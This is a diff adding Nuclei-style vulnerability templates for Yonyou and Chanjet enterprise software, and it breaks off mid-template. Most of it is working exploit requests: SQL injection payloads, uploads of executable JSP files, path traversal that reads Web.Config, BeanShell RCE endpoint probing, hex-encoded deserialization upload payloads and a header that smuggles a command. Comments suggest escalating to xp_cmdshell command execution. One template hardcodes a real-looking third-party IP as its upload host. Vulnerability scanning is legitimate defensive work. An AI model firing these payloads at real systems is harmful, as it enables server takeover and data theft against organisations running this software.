+# } +# } +# } diff --git a/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml b/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml new file mode 100755 index 0000000000..16a3070ad4 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml @@ -0,0 +1,21 @@ +id: chanjetcrm-createsite-sqli + +info: + name: Chanjetcrm - create_site SQL Injection + author: unknown + severity: critical + description: | + There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. + reference: + - https://stack.chaitin.com/techblog/detail?id=10 + tags: chanjetcrm,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/WebSer~1/create_site.php?site_id=1" + matchers: + - type: word + words: + - "register fail,please again" + part: body \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml new file mode 100755 index 0000000000..1d190ef477 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-chanjet-remote-gnfunction-sqli.yaml @@ -0,0 +1,52 @@ +id: yonyou-chanjet-remote-gnfunction-sqli + +info: + name: 畅捷通远程通 GNRemote.dll SQL注入漏洞 + author: SleepingBag945 + severity: high + description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + tags: yonyou,changjietong + +http: + - raw: + - | + POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1 + + - | + POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + username=%22'%20or%201%3d2%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1 + + + + matchers-condition: and + matchers: + - type: word + words: + - "{\"RetCode\":0}" + part: body_1 + condition: and + + - type: word + words: + - "{\"RetCode\":2}" + part: body_2 + condition: and + + - type: status + status: + - 200 + + + +# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml new file mode 100755 index 0000000000..ba54daed45 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-file-upload.yaml @@ -0,0 +1,40 @@ +id: yonyou-changjietong-tplus-file-upload + +info: + name: 畅捷通 T+ 任意文件上传漏洞 + author: SleepingBag945 + severity: critical + description: 畅捷通 T+ 系列产品存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。 + tags: yonyou,changjietong,upload + +http: + - raw: + - | + POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo + Accept-Encoding: gzip + + ------WebKitFormBoundaryuirnbcvo + Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg" + Content-Type: image/jpeg + + {{randstr_2}} + ------WebKitFormBoundaryuirnbcvo-- + + - | + GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1==200" + - "status_code_2==200" + - "contains(body_2, '{{randstr_2}}')" + condition: and + diff --git a/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml new file mode 100755 index 0000000000..809e9ad420 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-chanjet-tplus-ufida-sqli.yaml @@ -0,0 +1,35 @@ +id: yonyou-changjietong-tplus-ufida-sqli + +info: + name: 畅捷通 T+ Ufida.T.SM.Login.UIP SQL注入漏洞 + author: SleepingBag945 + severity: high + description: 畅捷通信息技术股份有限公司是一家致力于为中国小微企业提供以财务及管理服务为核心的平台服务、应用服务、数据增值服务。 畅捷通信息技术股份有限公司畅捷通存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。 + tags: yonyou,changjietong + +http: + - raw: + - | + POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Accept-Encoding: gzip + + {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""} + + + matchers-condition: and + matchers: + - type: word + words: + - "0x06d49632c9dc9bcb62aeaef99612ba6b" + - "Message\":\"245" + - "DatabaseException" + part: body + condition: and + + - type: status + status: + - 200 + diff --git a/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml b/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml new file mode 100755 index 0000000000..6d63bf8eae --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-chanjie-tplus-downloadproxy-file-read.yaml @@ -0,0 +1,29 @@ +id: yonyou-changjietong-tplus-downloadproxy-file-read + +info: + name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞 + author: SleepingBag945 + severity: medium + description: 用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件 + tags: yonyou,changjietong + +http: + - raw: + - | + GET /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + words: + - "xml version" + - "" + part: body + condition: and + + - type: status + status: + - 200 + diff --git a/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..756203235b --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-erp-u8-uploadfiledata-arbitrary-file-upload.yaml @@ -0,0 +1,51 @@ +id: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload + +info: + name: yonyou-erp-u8-uploadfiledata-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 用友U8+ERP客户关系管理软件存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html + tags: yonyou,upload + +http: + - raw: + - | + POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1 + Host: 60.172.58.9:8010 + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Content-Length: 327 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw + Accept-Encoding: gzip + + ------WebKitFormBoundaryqoqnjtcw + Content-Disposition: form-data; name="upload"; filename="emgeyr.jsp" + Content-Type: application/octet-stream + + <% {out.print("{{randstr_2}}");} %> + ------WebKitFormBoundaryqoqnjtcw + Content-Disposition: form-data; name="submit" + + submit + ------WebKitFormBoundaryqoqnjtcw-- + + - | + GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" + - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" + condition: and + + +# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml new file mode 100755 index 0000000000..c6cd934f97 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml @@ -0,0 +1,34 @@ +id: yonyou-fe-directory-traversal + +info: + name: yonyou-fe-directory-traversal + author: SleepingBag945 + severity: medium + description: 用友 FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html + tags: yonyou + +http: + - raw: + - | + GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Cookie: JSESSIONID=31DB4A83640B082DBA62A54ADB04D77C + Accept-Encoding: gzip + + + + matchers-condition: and + matchers: + - type: word + words: + - "window.location=\"templateOfTaohong_manager.jsp?path=\"" + - type: word + words: + - "var next=window.confirm(\"确定删除文件吗?\");" + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml new file mode 100755 index 0000000000..54685f19ff --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-sqli.yaml @@ -0,0 +1,39 @@ +id: yonyou-grp-u8-sqli + +info: + name: yonyou-grp-u8-sqli + author: SleepingBag945 + severity: critical + description: 用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html + tags: yonyou,grp,xxe,sqli + +http: + - raw: + - | + POST /Proxy HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e + + + + matchers-condition: and + matchers: + - type: word + words: + - "1759837260" + - type: word + words: + - "" + - type: status + status: + - 200 + + +# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..02bb7731bd --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-uploadfiledata-arbitrary-file-upload.yaml @@ -0,0 +1,45 @@ +id: yonyou-grp-u8-uploadfiledata-arbitrary-file-upload + +info: + name: yonyou-grp-u8-uploadfiledata-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 用友 GRP-U8 财务管理软件存在任意文件上传漏洞,攻击者可利用该漏洞上传恶意文件控制目标服务器。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20UploadFileData%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html + tags: yonyou,upload + +http: + - raw: + - | + POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename={{randstr_1}}.jsp&filename=1.jpg HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data + Accept-Encoding: gzip + + ------WebKitFormBoundary92pUawKc + Content-Disposition: form-data; name="myFile"; filename="test.jpg" + + <% out.println("{{randstr_2}}");%> + ------WebKitFormBoundary92pUawKc-- + + - | + GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" + - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" + condition: and + + +# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..07994cca95 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-arbitrary-file-upload.yaml @@ -0,0 +1,52 @@ +id: yonyou-nc-accept-arbitrary-file-upload + +info: + name: yonyou-nc-accept-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 用友NC在accept.jsp文件处存在任意文件上传漏洞。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html + tags: yonyou + +http: + - raw: + - | + POST /aim/equipmap/accept.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567 + Accept-Encoding: gzip + + -----------------------------16314487820932200903769468567 + Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.txt" + Content-Type: text/plain + + <% out.println("{{randstr_2}}"); %> + -----------------------------16314487820932200903769468567 + Content-Disposition: form-data; name="fname" + + \webapps\nc_web\{{randstr_3}}.jsp + -----------------------------16314487820932200903769468567-- + + - | + GET /{{randstr_3}}.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" + condition: and + + + +# 可尝试启动并调用xpcmdshell执行命令 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml new file mode 100755 index 0000000000..0a9270d27f --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-uploadservlet-deserialization-rce.yaml @@ -0,0 +1,22 @@ +id: yonyou-nc-baseapp-uploadservlet-deserialization-rce + +info: + name: Yonyou NC BaseApp UploadServlet Deserialization RCE + author: SleepingBag945 + severity: critical + description: | + Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. + tags: rce + +http: + - raw: + - | + GET /service/~baseapp/UploadServlet HTTP/1.1 + Host: {{Hostname}} + + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1,"java.io")' + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml b/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml new file mode 100755 index 0000000000..9a8826fc47 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-bshservlet-full-check.yaml @@ -0,0 +1,79 @@ +id: yonyou-nc-bshservlet-full-check + +info: + name: yonyou-nc-bshservlet-full-check + author: SleepingBag945 + severity: critical + description: 测试所有BshServlet RCE端点 + reference: + - https://github.com/parkourhe/yongYouNC-RCE/blob/master/poc.txt + tags: yonyou,nc + +http: + - method: GET + path: + - "{{BaseURL}}/servlet/~aim/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~alm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~ampub/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~arap/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~aum/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~cc/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~cdm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~cmp/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~ct/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~dm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~erm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fa/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fac/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fbm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~ff/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fip/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fipub/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fp/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fts/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~fvm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~gl/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrhi/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrjf/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrpd/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrpub/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrtrn/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~hrwa/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~ia/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~ic/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~iufo/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~modules/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~mpp/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~obm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~pu/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~qc/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~sc/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~scmpub/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so2/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so3/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so4/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so5/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~so6/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~tam/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~tbb/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~to/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uap/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapbd/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapde/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapeai/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapother/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapqe/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapweb/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~uapws/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~vrm/bsh.servlet.BshServlet" + - "{{BaseURL}}/servlet/~yer/bsh.servlet.BshServlet" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "BeanShell Test Servlet" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..d814725950 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-servlet-arbitrary-file-upload.yaml @@ -0,0 +1,33 @@ +id: yonyou-nc-dispatcher-servlet-arbitrary-file-upload + +info: + name: Yonyou-NC ServiceDispatcherServlet Arbitrary File Upload + author: SleepingBag945 + severity: critical + description: Yonyou-NC FileReceiveServlet Arbitrary File Upload + tags: yonyou,nc + +http: + - raw: + - | + POST /ServiceDispatcherServlet HTTP/1.1 + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0) + Content-Type: application/data + Host: {{Hostname}} + Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 + + {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}} + + + - | + GET /ncupload/n2d19a.jsp HTTP/1.1 + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200 && contains(body_2,'just_a_test')" + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..9ed15f65c3 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-filereceiveservlet-arbitrary-file-upload.yaml @@ -0,0 +1,33 @@ +id: yonyou-nc-filereceiveservlet-arbitrary-file-upload + +info: + name: Yonyou NC FileReceiveServlet Aribitrary File Upload + author: bjxsec + severity: high + tags: yonyou,oa,bjxsec,yonyouoa + description: fofa app="用友-UFIDA-NC" "/platform/yonyou-yyy.js" +variables: + file_name: "{{to_lower(rand_text_alpha(8))}}.jsp" + file_content: "{{to_lower(rand_text_alpha(26))}}" +http: + - raw: + - | + POST /servlet/FileReceiveServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 + Content-Type: multipart/form-data; + Referer: https://google.com + + {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}t00ls.jsp{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} + - | + GET /t00ls.jsp HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(body_2, '{{file_content}}')" + - "status_code_1 == 200 && status_code_2 == 200" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml new file mode 100755 index 0000000000..14892e8603 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-file-upload.yaml @@ -0,0 +1,39 @@ +id: yonyou-nc-grouptemplet-file-upload + +info: + name: yonyou-nc-grouptemplet-file-upload + author: SleepingBag945 + severity: critical + description: 用友NC任意文件上传 + reference: + - https://www.seebug.org/vuldb/ssvid-99547 + tags: yonyou + +variables: + v1: "{{rand_int(1,100)}}" + +http: + - raw: + - | + POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1 + Host: {{Hostname}} + Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7 + + ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7 + Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp" + Content-Type: application/octet-stream + + <%out.println("{{randstr_2}}");%> + ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7-- + + - | + GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml new file mode 100644 index 0000000000..1e9f7f67a8 --- /dev/null +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml @@ -0,0 +1,44 @@ +id: yonyou-nc-ncmessageservlet-rce + +info: + name: 用友NC NCMessageServlet反序列化漏洞 + author: SleepingBag945 + severity: critical + description: 用友NC在处理客户端请求数据的过程中。在反序列化用户提供的数据时,没有足够的检查和过滤,可能导致恶意的反序列化操作,在操作系统上执行命令。安全研究员经过分析后,发现该系统存在反序列化的利用点较多。目前在官方公开漏洞修复方案为对已知利用点进行反序列化白名单控制,以及对部分利用链依赖进行修复。导致该系统后续出现类似问题的可能性依旧较大。 + tags: yonyou,rce + +http: + - raw: + - | + POST /servlet/~baseapp/nc.message.bs.NCMessageServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Type: multipart/form-data; + X-T0KEN-INF0: set /A 987843129+808922377 + Accept-Encoding: gzip, deflate + + 